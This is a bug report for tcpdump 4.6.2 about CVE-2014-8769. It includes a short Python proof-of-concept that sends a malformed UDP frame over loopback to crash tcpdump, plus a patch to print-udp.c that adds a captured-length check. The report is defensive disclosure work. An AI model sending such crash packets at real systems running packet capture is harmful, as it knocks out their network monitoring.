Package: tcpdump
Version: 4.6.2
tags: Security

Using following script to generate packet:

#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))

aovd_frame = "\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"

s.send(aovd_frame)



#sudo tcpdump -i lo -s 0 -n -v
This cause segfault on tcpdump. This bug reports as CVE-2014-8769.
Propose patch is in attached file. Main idea is checking the length of
available data before print on screen.

The credit belong to
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de

Original report in bugtraq:
http://seclists.org/bugtraq/2014/Nov/88

CongNT


--- tcpdump-tcpdump-4.6/print-udp.c	2014-11-21 13:53:05.757690197 +0700
+++ tcpdump-4.6.2/print-udp.c	2014-11-21 13:50:58.077695164 +0700
@@ -357,6 +357,12 @@
 #ifdef INET6
 	register const struct ip6_hdr *ip6;
 #endif
+	u_int caplength;
+
+	/* Checking length of available data before print */
+	caplength = (ndo->ndo_snapend >= bp) ? ndo->ndo_snapend - bp : 0;
+	if (length > caplength)
+		length = caplength;
 
 	if (ep > ndo->ndo_snapend)
 		ep = ndo->ndo_snapend;

Reply via email to